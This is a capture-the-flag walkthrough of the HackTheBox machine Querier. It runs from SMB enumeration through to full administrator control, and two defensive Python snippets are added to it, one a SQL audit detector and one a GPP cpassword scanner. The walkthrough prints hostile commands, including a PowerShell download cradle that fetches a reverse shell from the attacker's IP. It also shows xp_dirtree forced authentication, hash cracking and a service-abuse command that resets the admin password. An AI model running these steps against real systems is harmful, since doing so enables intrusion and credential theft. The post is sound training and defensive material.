Hello Everyone!! In this post we will see how to pwn Querier from hackthebox.
Summary
Querier is a medium Windows machine. The initial foothold requires enumerating the SMB shares to obtain the password of a user, reporting, who can log in to the MSSQL server. To get user on the box, we steal the hash of the mssql-svc account by running the xp_dirtree command. Privilege escalation to administrator is pretty straightforward, as the box stores the administrator creds in GPP .XML files.
With all that being said, let’s get started.
Initial foothold
Running an nmap scan resulted in a lot of open ports, but this time port 80 wasn't among them, so the only remaining place to start the enumeration was SMB.
# nmap -sC -sV -o querier.nmap 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.27s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-07-05T15:44:27
|_Not valid after:  2050-07-05T15:44:27
|_ssl-date: 2020-07-05T15:45:28+00:00; +4m44s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m44s, deviation: 0s, median: 4m43s
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-05 21:15:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 5 21:10:54 2020 -- 1 IP address (1 host up) scanned in 41.58 seconds
Meanwhile I started a full port scan as well.
# nmap -p- -sV -A -T4 -vv 10.10.10.125 -o fullport.nmap
Listed all the shares with smbclient.
⚡ root@kali ~/Desktop/htb/querier> master smbclient -L 10.10.10.125
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
The Reports share looked like a custom one, so I listed its contents with smbmap.
# smbmap -R "Reports" -H 10.10.10.125
Downloaded the xlsm file with smbmap.
# smbmap -R "Reports" -H 10.10.10.125 -A 'Currency Volume Report.xlsm'
If you are not familiar with the .xlsm extension, here is a short explanation.
Files with the XLSM extension are spreadsheet files that support macros. XLSM files are similar to XLM file formats but are based on the Open XML format introduced in Microsoft Office 2007. A macro is used to record steps that are performed repeatedly, so the same actions can be carried out again by running the macro. All the steps performed by the user are recorded, and the process is termed macro recording. Macro recording generates VBA code in the form of a macro that can be edited using the Visual Basic Editor (VBE).
There is a Python package available that works with this extension. It can be installed with pip.
# pip install python-oletools
Under oletools, we have olevba, which is used to extract and analyze VBA macro source code from MS Office documents.
# olevba 10.10.10.125-Reports_Currency\ Volume\ Report.xlsm
Username: Password -> reporting:PcwTWTHRwryjc$c6
In the output we can see that olevba recovered the username and the password from the macro.
So now let's try to log in to the MSSQL server.
Here impacket's mssqlclient.py can be used to log in to the server. The -windows-auth flag has to be specified explicitly, as Windows authentication is not used by default.
# mssqlclient.py reporting@10.10.10.125 -windows-auth
And we are logged in!!!
Getting the user.txt
As reporting we had minimal privileges, but this user can still easily steal the hash of the account the SQL service runs as. This can be done with xp_dirtree, a stored procedure that returns a list of every folder, every subfolder, and every file under the path you give it. Here we set the path to a share on our own host that doesn't even exist and start Responder on tun0. When the service tries to access the share, Responder logs the hash of the service account.
# xp_dirtree '\\10.10.14.15\test\'
# responder -I tun0
The hash is of the NTLMv2 type. The hashcat mode for it can be found in the hashcat example hashes list, and it comes out to be 5600.
# hashcat -m 5600 hash_sql /usr/share/wordlists/rockyou.txt --force
The username is mssql-svc (it can be seen in the hash) and the password is corporate568. Trying these creds with mssqlclient.py, I logged in successfully.
This time enable_xp_cmdshell was available to the user. With xp_cmdshell we can execute OS commands on the SQL server.
We are now mssql-svc.
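A detection-side counterpart to the two steps above, added here as an example and not part of the original post: it scans constructed SQL Server audit lines (in an assumed timestamp|login|statement shape) for xp_dirtree-style procedures that force the service account to authenticate to an untrusted UNC host, and for xp_cmdshell being enabled at runtime or used as a download cradle. The trusted network and host names are assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample audit lines (timestamp|login|statement); not from the post.
SAMPLE_AUDIT = """\
2020-07-05T21:20:01|HTB\\reporting|EXEC master..xp_dirtree '\\\\10.10.14.15\\test\\'
2020-07-05T21:20:05|HTB\\reporting|SELECT name FROM sys.databases
2020-07-05T21:22:10|HTB\\mssql-svc|EXEC sp_configure 'xp_cmdshell', 1
2020-07-05T21:22:12|HTB\\mssql-svc|EXEC xp_cmdshell 'powershell IEX(New-Object Net.Webclient).downloadString("http://10.10.14.15/rev.ps1")'
2020-07-05T21:25:00|HTB\\backup|EXEC master..xp_dirtree '\\\\fileserver01\\backups\\'
"""

# Hypothetical trust boundary: the lab's own /24 plus one named file server.
TRUSTED_NETS = [ip_network("10.10.10.0/24")]
TRUSTED_HOSTS = {"fileserver01"}

# Procedures that make SQL Server open an outbound SMB connection, and so
# authenticate as its service account, to whatever UNC path they are given.
FORCED_AUTH_PROCS = re.compile(r"\bxp_(dirtree|fileexist|subdirs)\b", re.I)
UNC_HOST = re.compile(r"\\\\([A-Za-z0-9_.\-]+)\\")
ENABLE_CMDSHELL = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
CMDSHELL_CRADLE = re.compile(r"xp_cmdshell.*(downloadstring|\biex\b|invoke-expression)", re.I)

def host_is_trusted(host):
    try:
        return any(ip_address(host) in net for net in TRUSTED_NETS)
    except ValueError:                  # not an IP literal: compare as a hostname
        return host.lower() in TRUSTED_HOSTS

def scan_audit(text):
    """Return (line_no, login, reason) for every statement worth an alert."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        _ts, login, stmt = line.split("|", 2)
        if FORCED_AUTH_PROCS.search(stmt):
            for host in UNC_HOST.findall(stmt):
                if not host_is_trusted(host):
                    alerts.append((n, login, f"forced SMB auth to untrusted host {host}"))
        if ENABLE_CMDSHELL.search(stmt):
            alerts.append((n, login, "xp_cmdshell enabled at runtime"))
        elif CMDSHELL_CRADLE.search(stmt):
            alerts.append((n, login, "xp_cmdshell running a download cradle"))
    return alerts

if __name__ == "__main__":
    for line_no, login, reason in scan_audit(SAMPLE_AUDIT):
        print(f"line {line_no}: {login}: {reason}")
```

The first alert is the one that matters most for prevention: blocking outbound SMB (445) from the database host to anything outside the trusted set removes the forced-authentication path entirely, whatever the login's privileges inside SQL Server.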
Reverse shell
I used Invoke-PowerShellTcp.ps1 from the nishang scripts to obtain the reverse shell. Set up the nc listener and a SimpleHTTPServer on port 80.
Run the following command at the SQL prompt:
> xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.15/rev.ps1\")
And we got the shell. Grab user.txt.
Privilege escalation to administrator
Upload PowerUp.ps1 from the PowerSploit tools, which is used to enumerate the box for privilege escalation paths.
# xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.15/PowerUp.ps1\")
# Invoke-AllChecks
In the results of the PowerUp enumeration, I found two routes that could lead us to administrator. The first was abusing the UsoSvc service, as we had the privilege to restart it. I will show this route at the end of the post.
In the same enumeration, I also found the GPP .xml files, which directly returned the administrator's password.
Administrator:MyUnclesAreMarioAndLuigi!!1!
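The GPP finding above comes from Group Policy Preferences XML files in SYSVOL that carry an encrypted cpassword attribute, readable by any domain user. As an added example (not from the post, and not PowerUp's code), here is a small scanner that walks a Policies tree and reports every preference item that still stores one, without decrypting anything; the Groups.xml content is constructed and its cpassword value is a placeholder.

```python
import os
import xml.etree.ElementTree as ET

# Constructed Groups.xml in the Group Policy Preferences layout. The cpassword
# value is a made-up placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator" changed="2019-01-28 23:12:48" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" cpassword="PLACEHOLDER_ENCRYPTED_VALUE" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator"/>
  </User>
  <User name="helpdesk" changed="2019-02-01 10:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" userName="helpdesk"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_text, source="Groups.xml"):
    """Return one record per element carrying a cpassword attribute."""
    # Attribute-based on purpose: Groups.xml, Services.xml, ScheduledTasks.xml,
    # DataSources.xml, Drives.xml and Printers.xml all embed credentials this way.
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        owner = parents.get(elem, elem)   # the <User>/<Service>/... item holding it
        findings.append({
            "file": source, "element": owner.tag, "name": owner.get("name", ""),
            "userName": elem.get("userName") or elem.get("accountName") or elem.get("runAs", ""),
            "action": elem.get("action", ""), "changed": owner.get("changed", ""),
        })
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL or Policies tree and apply find_cpasswords to every XML file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fn in files:
            if fn.lower().endswith(".xml"):
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, encoding="utf-8-sig") as fh:
                        findings.extend(find_cpasswords(fh.read(), path))
                except (ET.ParseError, OSError):
                    continue      # unreadable, or not an XML preferences file
    return findings
```

Every hit is a credential that any domain user can read; the fix is to delete the preference item and rotate the account, since Microsoft's 2014 change only stopped new cpassword values from being written and left existing files in place.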
I used these creds with impacket's psexec.py and logged in successfully.
# psexec.py administrator@10.10.10.125
Box is pwned!!!
Now the alternative!
Since we could abuse the UsoSvc service, I tried running
# Invoke-ServiceAbuse -Name 'UsoSvc' -Command 'net user administrator hacked!!'
This command changes the administrator's password to hacked!!
Again, these creds can be used with psexec.py to obtain a shell as admin.
That's all for the blog post. Thanks for reading! For more such content, subscribe to my page.
See you in the next one!! Until then, happy hunting.